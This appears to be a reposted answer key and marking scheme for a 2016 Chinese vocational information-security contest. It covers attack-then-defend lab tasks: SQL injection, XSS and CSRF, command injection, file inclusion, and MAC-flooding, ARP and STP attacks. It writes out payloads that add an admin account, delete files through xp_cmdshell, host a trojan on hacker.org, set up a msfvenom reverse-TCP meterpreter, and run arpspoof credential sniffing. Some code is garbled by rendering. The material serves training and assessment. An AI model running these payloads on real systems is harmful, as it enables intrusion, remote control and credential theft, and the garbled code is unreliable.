zoukankan      html  css  js  c++  java
  • 全国职业院校技能大赛2016年高职组信息安全管理与评估都二阶段答案及评分

    任务1:SQL注入攻防(55分)

    1. Web访问DCST中的WebServ2003服务器,进入login.php页面,分析该页面源程序,找到提交的变量名,并截图;(5分)
      找到源程序:(2分)
      在这里插入图片描述
      页面标题:Login Page
      找到提交的变量名(3分)
      提供以下变量:
      name=“usernm”
      name=“passwd”

    2. 对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过任意用户名登录,并将测试过程截图;(5分)

    构造注入语句:
    username:任意用户名
    password:含:or X=’X
    (X为任意值)
    (3分)

    同时包含截图:
    1、通过任意用户名登录(截图)
    在这里插入图片描述

    2、登录成功页面(截图)
    在这里插入图片描述
    (2分)
    3. 进入DCST中的WebServ2003服务器的C:AppServwww目录,找到loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序截图;(10分)

    在这里插入图片描述
    (10分)
    包含语句:
    1、
    select password from users where username=’username2if(username’ 2、 if(obj->password==$password)

    1. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行SQL注入渗透测试无效,并将验证过程截图;(5分)
      同时包含截图:
      1、通过任意用户名登录(截图)
      在这里插入图片描述
      2、登陆后,页面出现用户名不存在提示;(截图)
      在这里插入图片描述
      (5分)

    2. Web继续访问DCST中的WebServ2003服务器,"/"->“Employee Information Query”,分析该页面源程序,找到提交的变量名,并截图;(5分)
      找到源程序:(2分)
      在这里插入图片描述

    找到的源程序含有页面标题:

    Query

    找到提交的变量名(3分)
    name=“usernm”

    1. 对该任务题目5页面注入点进行渗透测试,根据输入“%”以及“_”的返回结果确定是注入点,并将测试过程截图;(5分)
      在这里插入图片描述

    (2分)
    输入“%”,返回所有用户信息(截图)
    在这里插入图片描述
    输入“_”,返回所有用户信息(截图)
    (3分)

    1. 通过对该任务题目5页面注入点进行SQL注入渗透测试,删除DCST中的WebServ2003服务器的C:目录下的1.txt文档,并将注入代码及测试过程截图;(5分)

    构造注入语句:
    ‘exec master.dbo.xp_cmdshell ‘del c:1.txt’–
    (5分)

    1. 进入DCST中的WebServ2003服务器的C:AppServwww目录,找到QueryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入渗透测试,并将修改后的PHP源程序截图;(10分)
      截图:
      在服务器场景QueryCtrl.php源程序语句:keyWord=keyWord=_REQUEST[‘usernm’]之后加入:

    (10分)

    1. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。(5分)
      通过:‘exec master.dbo.xp_cmdshell ‘del c:1.txt’—
      再次进行SQL注入截图;
      系统出现错误提示:Bad KeyWord!(截图)
      (5分)
      在这里插入图片描述
      任务2:XSS和CSRF攻防(65分)

    2. Web访问DCST中的WebServ2003服务器,"/"->" Employee Message Board",分析该页面源程序,找到提交的变量名,并截图;(5分)
      找到源程序:(2分)
      在这里插入图片描述

    含有页面标题:Message Board
    找到提交的变量名:(3分)
    name=“MessageUsername”
    name=“message”

    1. 对该任务题目1页面注入点进行XSS渗透测试,并进入"/"->" Employee Message Board"->"Display Message"页面,根据该页面的显示,确定是注入点,并将测试过程截图;(5分)
      构造注入代码:(2分)

    测试注入成功:(3分)
    在这里插入图片描述
    弹出alert(“Hacker!”)括号中的消息;

    1. 对该任务题目1页面注入点进行渗透测试,使"/"->" Employee Message Board"->"Display Message"页面的访问者执行网站(http://hacker.org/)中的木马程序:http://hacker.org/TrojanHorse.exe,并将注入代码及测试过程截图;(5分)

    构造注入代码:(2分)

    测试过程:(3分)
    在这里插入图片描述
    名称:trojanhorse.exe
    发送者:hacker.org

    1. 通过IIS搭建网站(http://hacker.org/),并通过Kali生成木马程序TrojanHorse.exe,将该程序复制到网站(http://hacker.org/)的WWW根目录下,并将搭建该网站结果截图;(5分)
      搭建IIS(1分)
      在这里插入图片描述
      Internet信息服务:
      网站目录下存放:
      trojanhorse.exe
      搭建DNS(1分)
      在这里插入图片描述
      正向查找区域:主机(截图)
      Zone:Org
      主机:hacker

    Metasploit Framework:TrojanHorse.exe生成 (3分)
    root@bt:~#Ifconfig
    (截图)
    显示Kali IP地址:X.X.X.X
    在这里插入图片描述
    截图包含:
    root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=80 –f exe –o trojanhorse.exe

    1. 当"/"->" Employee Message Board"->"Display Message"页面的访问者执行网站(http://hacker.org/)中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)
      Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)
      root@bt:~#msfconsole
      msf > use exploit/multi/handler
      msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(handler) > set LHOST X.X.X.X
      LHOST => X.X.X.X
      msf exploit(handler) > set LPORT 80
      LPORT => 80
      msf exploit(handler) > exploit
      [] Started reverse handler on X.X.X.X:80
      [
      ] Starting the payload handler…
      (截图中包含黄色部分)
      访问者主机需要被Kali主机远程控制(3分)
      Kali MSF提示(截图)包含如下信息
      Kali IP:X.X.X.X
      访问者主机IP:Y.Y.Y.Y
      [] Sending stage (…… bytes) to Y.Y.Y.Y
      [
      ] Meterpreter session 1 opened (X.X.X.X:Port1 -> Y.Y.Y.Y:Port2) at ……
      meterpreter >
      在这里插入图片描述
      Kali截图包含打开访问者主机的CMD.exe命令行窗口;
      在这里插入图片描述

    2. 进入DCST中的WebServ2003服务器的C:AppServwww目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分)
      (10分)

    在服务器场景原insert.php程序语句info=info=_REQUEST[‘message’]后加入:
    绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分;
    info=strreplace(<,(,info=str_replace(“<”,”(”,info);
    info=strreplace(>,),info=str_replace(“>”,”)”,info);

    info=strreplace(<,,info=str_replace(“<”,”{”,info);
    KaTeX parse error: Expected 'EOF', got '}' at position 24: …_replace(“>”,” }̲”,info);

    info=strreplace(<,[,info=str_replace(“<”,”[”,info);
    info=strreplace(>,],info=str_replace(“>”,” ]”,info);

    1. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)
      在这里插入图片描述
      SQL Server企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“<”和“>”被替换为上一题替换后的字符;
      (5分)

    2. Web访问DCST中的WebServ2003服务器,"/"->" Shopping Hall",分析该页面源程序,找到提交的变量名,并截图;(5分)
      找到源程序:(2分)
      在这里插入图片描述
      页面标题为:

      Shopping Hall


      找到提交的变量名:(3分)
      goods=keyboard&quantity=1
      goods=mouse&quantity=1
      goods=monitor&quantity=1
      goods=cpu&quantity=1
      goods=memory&quantity=1
      goods=dvdrom&quantity=1

    3. 对该任务题目1页面注入点进行渗透测试,使"/"->" Employee Message Board"->“Display Message"页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看”/"->"PurchasedGoods.php页面,并将注入代码及测试过程截图;(5分)
      构造注入代码:(2分)

    WebServer IP:X.X.X.X

    测试过程:(3分)

    在这里插入图片描述
    截图:
    Goods:CPU----数值大于或等于999999

    1. 进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayMessage.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御CSRF渗透测试,并将修改后的源程序截图;(10分)
      在这里插入图片描述
      截图:
      服务器场景DisplayMessage.php程序语句:
      echo “Content:”.”obj>info.echoContent:.striptagsobj->info”.”……” 替换为: echo “Content:”.strip_tags(”obj->info”).”……”
      (10分)
    2. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行CSRF渗透测试无效,并将验证过程截图;(5分)
      在这里插入图片描述
      (5分)
      得分点:直接显示代码信息,而不是将代码执行;
      (截图)
      SQL Server企业管理器中,Message表中info字段注入语句含有标记;

    任务3:命令注入与文件包含攻防(50分)

    1. Web访问DCST中的WebServ2003服务器,"/"->" Display Directory",分析该页面源程序,找到提交的变量名,并截图;(5分)
      找到源程序:(2分)
      在这里插入图片描述
      页面标题:
    Display C:’s Directory 找到提交的变量名:(3分) name="directory"
    1. 对该任务题目1页面注入点进行渗透测试,使页面DisplayDirectoryCtrl.php回显C:Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码及测试过程截图;(5分)
      注入语句:(2分)
      WINDOWS | net user Hacker P@ssword /add
      WINDOWS | net localgroup administrators Hacker /add
      测试成功:(3分)
      截图:
      在这里插入图片描述
      含有:命令成功完成。

    2. 进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayDirectoryCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御命令注入渗透测试,并将修改后的源程序截图;(10分)
      在这里插入图片描述
      (10分)
      包含语句:
      str=if(strstr(str=’|’ if(strstr(directory,$str)==false)

    3. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试无效,并将验证过程截图;(5分)
      截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;、

    在这里插入图片描述
    含有本任务第2题的命令注入语句;
    WINDOWS | net user Hacker P@ssword /add
    WINDOWS | net localgroup administrators Hacker /add
    截图2:页面出现非法输入提示;
    含有本任务题目3修改后代码中的错误提示信息;
    本案例提示信息为:illegal input!
    (5分)

    1. Web访问DCST中的WebServ2003服务器,"/"->" Display Uploaded’s File Content",分析该页面源程序,找到提交的变量名,并截图;(5分)
      找到源程序:(2分)

    在这里插入图片描述
    页面标题:Display Upload’s File Content

    找到提交的变量名:(3分)
    name=“filename”

    1. 对该任务题目5页面注入点进行渗透测试,使页面DisplayFileCtrl.php回显DCST中的WebServ2003服务器访问日志文件:AppServ/Apache2.2/logs/access.log的内容,并将注入代码及测试过程截图;(5分)
      构造注入代码:(2分)
      …AppServApache2.2logsaccess.log
      回显DCST中的WebServ2003服务器访问日志文件:显示出AppServ/Apache2.2/logs/access.log的内容:(3分)

    在这里插入图片描述
    Internet Explorer地址栏中须含有:
    DisplayFileCtrl.php?filename=

    1. 进入DCST中的WebServ2003服务器的C:AppServwww目录,找到DisplayFileCtrl.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御文件包含渗透测试,并将修改后的源程序截图;(10分)
      在这里插入图片描述
      (10分)
      包含语句:
      str=..if(strstr(str=’..’ if(strstr(directory,$str)==false)

    2. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该DCST中的WebServ2003服务器进行文件包含渗透测试无效,并将验证过程截图。(5分)

    截图1:利用注入点对该DCST中的WebServ2003服务器进行命令注入渗透测试;
    在这里插入图片描述
    输入框含有本任务题目6的注入代码:
    …AppServApache2.2logsaccess.log
    截图2:页面出现非法输入提示;
    含有本任务题目7修改后代码中的错误提示信息;
    本案例提示信息为:illegal input!

    (5分)

    任务4:数据窃取防护:二层攻防(45分)

    1. 将PC1、Kali所连接端口划入与WAF同一VLAN(VLAN10),并将PC1、Kali分配与DCST服务器相同网段IP地址,使PC1、Kali、DCST中的WebServ2003服务器能够在同一个网段(VLAN10)内相互Ping通。(2分)
      截图:
      PC1、Kali、DCST同在VLAN10;(#show vlan)
      在这里插入图片描述
      VLAN10中包含的接口数>=3;

    WebServer IP配置(与参数表中服务器场景的IP地址一致):
    在这里插入图片描述
    PC1 IP地址配置(与参数表中PC1的IP地址一致):
    在这里插入图片描述
    PC3 IP地址配置(与参数表中PC3的IP地址一致):
    在这里插入图片描述
    三个终端之间能够相互Ping通;
    在这里插入图片描述
    在这里插入图片描述
    在同一个窗口ping通除了本机外的2个IP地址;

    1. 查看DCRS交换机VLAN10的MAC地址表容量信息,并将DCRS交换机配置相关参数、查看命令、查看结果截图。(3分)

    #show mac-address-table count vlan 10
    在这里插入图片描述
    DCRS地址表空间中有可用的空间;
    当前地址表记录数少于地址表容量;
    Max entires……
    Total……:16384
    Current entires……
    Total……:该数值小于10

    1. 从Kali发起MAC Flooding渗透测试,使DCRS交换机的MAC地址表溢出,使其在MAC地址表溢出的条件下,无法学习到PC1和DCST中的WebServ2003服务器的MAC地址表信息,查看DCRS交换机的MAC地址表信息,并将渗透测试过程截图。(5分)
      Kali#macof
      在这里插入图片描述

    (2分)
    #show mac-address-table count vlan 10
    在这里插入图片描述

    当前地址表记录数等于地址表容量;
    Max entires……
    Total……:16384
    Current entires……
    Total……:该数值=16384
    (3分)

    1. Kali打开wireshark,验证在DCRS交换机MAC地址表溢出的条件下,可以监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将该验证过程截图。(5分)
      PC1通过Internet Explorer访问;(截图)

    地址栏包含:
    服务器场景IP(匹配参数表服务器场景IP)/……
    Kali打开wireshark,监听到PC1通过Internet Explorer访问DCST服务器场景的HTTP流量;

    在这里插入图片描述
    截图:
    Source:PC1的IP地址(与参数表一致)
    Destination:服务器场景的IP地址(与参数表一致)
    Protocol:HTTP
    (5分)

    1. 在DCRS交换机Kali所连接端口配置Port Security特性,阻止Kali发起MAC Flooding渗透测试,验证此时DCRS交换机MAC地址表能够学习到PC1、DCST中的WebServ2003服务器的MAC地址,并将DCRS交换机相关配置信息以及验证信息截图。(8分)
      配置截图包含:
      mac-address-learning cpu-control
      (2分)
      在VLAN10每个接口全部启用如下:
      Interface Ethernet1/0/X
      switchport port-security
      (2分)
      #clear mac-address-table dynamic
      (2分)
      #show mac-address-table count vlan 10
      在这里插入图片描述
      DCRS地址表空间中有可用的空间;
      当前地址表记录数少于地址表容量;
      Max entires……
      Total……:16384
      Current entires……
      Total……:该数值小于10
      (2分)

    2. 在DCRS交换机配置Port Security特性的条件下,Kali再次打开wireshark,监听PC1访问DCST中的WebServ2003服务器流量,验证此时Kali无法监听到PC1访问DCST中的WebServ2003服务器的HTTP流量,并将验证过程截图。(7分)
      PC1通过Internet Explorer访问服务器场景;(截图)

    地址栏包含:
    服务器场景IP(匹配参数表服务器场景IP)/……
    Kali打开wireshark,监听不到PC1通过Internet Explorer访问DCST的HTTP流量;(截图)

    在这里插入图片描述
    Filter:http
    显示报文数:空
    任务5:数据窃取防护:ARP攻防(45分)

    1. 在PC1访问DCST中的WebServ2003服务器时,查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将PC1和DCST中的WebServ2003服务器的ARP缓存信息截图。(5分)

    PC1、WebServ2003
    Ipconfig/all
    分别显示PC1、WebServ2003的IP和MAC;
    PC1的IP和MAC:
    在这里插入图片描述

    服务器场景的IP和MAC:
    在这里插入图片描述
    PC1通过Internet Explorer访问服务器场景;(截图)
    在这里插入图片描述
    地址栏包含:
    服务器场景IP(匹配参数表服务器场景IP)/……

    PC1:ARP表项内容为
    WebServ2003的IP->WebServ2003的真实的MAC;
    在这里插入图片描述
    WebServ2003:ARP表项内容为
    PC1的IP-> PC1的真实的MAC;
    在这里插入图片描述
    2. 在Kali对PC1进行ARP Spoofing渗透测试,使PC1无法访问DCST中的WebServ2003服务器,PC1的ARP缓存为:DCST中的WebServ2003服务器IP->Kali的MAC地址,在PC1查看被Kali毒化后的ARP缓存信息,并将该信息截图。(5分)
    Kali:
    #arpspoof –t PC1_IP WebServ2003_IP
    在这里插入图片描述

    (过程截图)
    (2分)
    PC1:ARP表项内容为
    WebServ2003的IP->Kali的MAC;

    在这里插入图片描述
    Kali MAC:ifconfig
    (截图)
    在这里插入图片描述

    (3分)
    3. 在Kali对PC1和DCST中的WebServ2003服务器进行ARP中间人渗透测试,使Kali能够使用wireshark监听到PC1向DCST中的WebServ2003服务器的LoginAuth.php页面提交的登录网站用户名、密码参数,并将该渗透测试过程截图。(7分)
    Kali:
    #arpspoof –t PC1_IP WebServ2003_IP
    在这里插入图片描述

    #arpspoof –t WebServ2003_IP PC1_IP
    在这里插入图片描述

    #echo 1 > /proc/sys/net/ipv4/ip_forward
    在这里插入图片描述
    (3分)
    PC1通过Internet Explorer访问服务器场景;(截图)
    在这里插入图片描述
    地址栏包含:
    服务器场景IP(匹配参数表服务器场景IP)/success.php

    Kali打开wireshark,监听到PC1通过Internet Explorer访问DCST服务器场景的HTTP流量;(截图)
    在这里插入图片描述
    截图中包含PC1通过Internet Explorer访问DCST服务器场景的用户名、密码;
    包含:usernm=XXX&passwd=XXX
    (4分)

    1. 在DCRS交换机上配置Access Management特性阻止Kali发起ARP Spoofing渗透测试,并将DCRS交换机该配置信息截图。(5分)

    配置截图包含:
    am enable
    (2分)
    只在连接Kali的接口配置:
    Interface Ethernet1/0/X
    am port
    am mac-ip-pool Mac(Kali) IP(Kali)
    (3分)
    5. 在DCRS交换机上配置Access Management特性的条件下,再次在Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,此时DCRS交换机的Access Management特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将该信息截图。(8分)
    (4分)
    PC1:ARP表项内容为
    WebServ2003的IP->WebServ2003的真实的MAC;
    在这里插入图片描述

    (4分)
    WebServ2003:ARP表项内容为
    PC1的IP-> PC1的真实的MAC;
    在这里插入图片描述
    6. 在DCRS交换机上删除Access Management技术配置,通过IP DHCP Snooping Bind特性来阻止Kali发起ARP Spoofing渗透测试,并将DCRS交换机相关配置信息截图。(7分)

    配置截图包含:
    ip dhcp snooping enable
    (1分)
    ip dhcp snooping vlan 10
    (1分)
    ip dhcp snooping binding enable
    (1分)
    ip dhcp snooping binding user Mac(Kali) address IP(Kali) vlan 10 interface Ethernet1/0/X(Kali连接的接口)

    (2分)
    在Kali连接的接口配置:
    Interface Ethernet1/0/X
    ip dhcp snooping binding user-control
    (2分)

    1. 在DCRS交换机上配置IP DHCP Snooping Bind特性的条件下,再次在Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,此时DCRS交换机的IP DHCP Snooping Bind特性能够阻止Kali对PC1和DCST中的WebServ2003服务器进行ARP Spoofing渗透测试,再次查看PC1和DCST中的WebServ2003服务器的ARP缓存信息,并将该信息截图。(8分)

    (4分)
    PC1:ARP表项内容为
    WebServ2003的IP->WebServ2003的真实的MAC;
    在这里插入图片描述
    (4分)
    WebServ2003:ARP表项内容为
    PC1的IP-> PC1的真实的MAC;
    在这里插入图片描述
    任务6:数据窃取防护:生成树攻防(40分)

    1. 在DCRS交换机开启生成树协议,生成树协议模式为STP,DCRS交换机优先级为0,防止网络出现物理环路,显示DCRS交换机生成树协议的状态,并将该信息截屏;(5分)
      STP配置:(2分)
      配置截图包含:
      spanning-tree
      spanning-tree mode stp
      spanning-tree mst 0 priority 0
      显示DCRS交换机生成树协议的状态: (3分)
      #show spanning-tree
      在这里插入图片描述

    Root ID:this Switch(必须)

    1. 在Kali向DCRS交换机发起Take Over The Root Bridge渗透测试,使DCRS交换机认为Kali为Root Bridge,显示DCRS交换机生成树协议的状态,并将该信息截屏;(5分)
      Kali: Yersinia –G(截图)
      在这里插入图片描述

    Claiming Root Role(选择)
    在这里插入图片描述

    Root ID:为Kali的ID(Root ID近似等于Self Bridge Id)
    (3分)

    1. 配置DCRS交换机生成树协议安全特性,阻止Take Over The Root Bridge渗透测试,并将DCRS交换机相关配置信息截屏;(7分)
      法一:
      配置截图包含:
      VLAN10的每个接口都做:
      Switch(config-if-ethernet1/0/X)#spanning-tree rootguard
      法二:
      配置截图包含:
      VLAN10的每个接口都做:
      Switch(config-if-ethernet1/0/X)#spanning-tree portfast bpduguard recovery (任意值)
      法三:
      配置截图包含:
      VLAN10的每个接口都做:
      Switch(config-if-ethernet1/0/X)#spanning-tree portfast bpdufilter

    2. 在DCRS交换机配置生成树协议安全特性的条件下,DCRS交换机不会认为Kali为Root Bridge,由Kali再次向DCRS交换机发起Take Over The Root Bridge渗透测试,再次显示DCRS交换机生成树协议的状态,并将以上验证过程截屏;(8分)

    在这里插入图片描述
    Claiming Root Role(选择)
    (4分)
    在这里插入图片描述
    Root ID:this switch
    (4分)

    1. 由Kali向DCRS交换机发起BPDU DOS渗透测试,提高DCRS交换机CPU的利用率,显示DCRS交换机CPU的利用率,并将该信息截屏;(5分)

    在这里插入图片描述

    选择:Sending conf BPDUs
    (2分)
    渗透前交换机CPU的利用率
    在这里插入图片描述
    渗透后交换机CPU的利用率
    在这里插入图片描述
    CPU的利用率须大于正常的CPU利用率(与正常CPU利用率进行比较)
    (3分)

    1. 配置DCRS交换机生成树协议安全特性,阻止BPDU DOS渗透测试,并将配置信息截屏;(5分)
      配置截图包含:
      VLAN10的每个接口都做:
      Switch(config-if-ethernet1/0/X)#spanning-tree portfast bpduguard recovery (任意值)

    2. 在DCRS交换机配置生成树协议安全特性的条件下,DCRS交换机不会受Kali的BPDU DOS渗透测试影响,此时由Kali再次向DCRS交换机发起BPDU DOS渗透测试,显示DCRS交换机CPU的利用率,并将该验证截屏;(5分)

    在这里插入图片描述

    选择:Sending conf BPDUs
    (2分)
    渗透前交换机CPU的利用率
    在这里插入图片描述
    渗透后交换机CPU的利用率
    在这里插入图片描述
    CPU的利用率在渗透前后须无明显变化
    (3分)

  • 相关阅读:
    C# 判断一个文本文件的编码格式(转载)
    img图片加载出错处理(转载)
    C#中当程序的访问权限不足时,Directory.Exists和File.Exists方法不会抛出异常报错
    ajax上传文件以及实现上传进度条(转载)
    通过jQuery Ajax使用FormData对象上传文件 (转载)
    CMD命令查看当前电脑安装所有版本.NET Core SDK(转载)
    SQL Server聚合函数与聚合开窗函数 (转载)
    C#中,使用显式类型转换(int)和Math.Round方法,将浮点数转换为整数的区别
    SQLServer 窗口函数(转载)
    node-webkit教程(8)Platform Service之Clipboard
  • 原文地址:https://www.cnblogs.com/cqnswp/p/12568823.html
Copyright © 2011-2022 走看看